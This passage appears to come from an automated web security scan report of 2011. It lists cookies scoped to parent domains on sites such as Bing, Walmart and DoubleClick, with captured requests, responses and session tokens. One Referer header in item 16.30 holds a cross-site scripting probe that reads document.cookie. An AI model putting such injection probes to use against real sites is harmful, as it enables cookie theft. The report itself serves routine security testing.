Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/honolulu-hawaii-trips-1002751
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=5; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z1frs5ci265ddmyz5ee43ld448c06_VID-n3drr7hochmdyz5qnmnshetag4o_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:03 GMT; Path=/travel
Set-Cookie: JSESSIONID=0915020A0415116467B0471DBB4BFCCC; Domain=.bing.com; Path=/travel
Set-Cookie: _HOP=I=1&TS=1296345183; domain=.bing.com; path=/
Set-Cookie: _SS=SID=1A1CA9064645474DA9C96504F5DBD78E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

16.14. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=30926D6422C305F2841AF2C231837CCF; Domain=.bing.com; Path=/travel
ETID=BCID-z6d2ojptrcpcsnyz5s94j9eripmvh_VID-2qgb11njgihtayz4ep5daa0tahh5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
_SS=SID=52ECE574E10C48CFB614C0DDE7323FE8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f06a5eed62441db9a221eb26be6486f; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/hotels HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33604
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=813; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z6d2ojptrcpcsnyz5s94j9eripmvh_VID-2qgb11njgihtayz4ep5daa0tahh5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
Set-Cookie: JSESSIONID=30926D6422C305F2841AF2C231837CCF; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=52ECE574E10C48CFB614C0DDE7323FE8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f06a5eed62441db9a221eb26be6486f; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.15. http://www.dailygrail.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.17. http://www.kanoodle.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/43
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...

16.18. http://www.kanoodle.com/ajax/search_spy_data.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 529

&title=Top+Searches+-+Recent,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#0
...[SNIP]...

16.19. http://www.kanoodle.com/ajax/search_spy_data_today.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data_today.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data_today.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

16.20. http://www.kanoodle.com/search_spy.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/search_spy.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search_spy.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

16.21. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:00:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 30 Jan 2011 01:50:28 GMT
ETag: "cccc2ce42797085e2ccf82df13a9cd5b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

16.22. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:55 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 29 Jan 2011 23:16:07 GMT
ETag: "1126140718825d2e8a4072da2e624330"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

16.23. http://www.popsci.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.popsci.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.24. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.walmart.com
Path:	/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Sun, 30 Jan 2011 02:03:54 GMT
Expires: Sun, 30 Jan 2011 02:03:54 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 12096
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907962045525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew29 (ew29_7330869248_34521600)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ
...[SNIP]...

16.25. http://www.zacks.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.zacks.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.26. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3973.MSN/B4412732.227

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608? HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:33 GMT
Location: http://s0.2mdn.net/viewad/1150992/54-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html

16.27. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Set-Cookie: id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:11:59 GMT
Expires: Sun, 30 Jan 2011 17:11:59 GMT
Discarded: true
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/0/0/%2a/s;
...[SNIP]...

16.28. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3a9f/7/0/*/q;234336715;1-0;0;57860936;4307-300/250;40005125/40022912/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch
Set-Cookie: id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT
Date: Sun, 30 Jan 2011 02:04:52 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

16.29. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;235581983;52388360;s HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?mode=flash&sneakpeek=y&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYADSNEAKPEEK:VARIOUS:N
Set-Cookie: id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT
Date: Sat, 29 Jan 2011 23:45:11 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

16.30. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
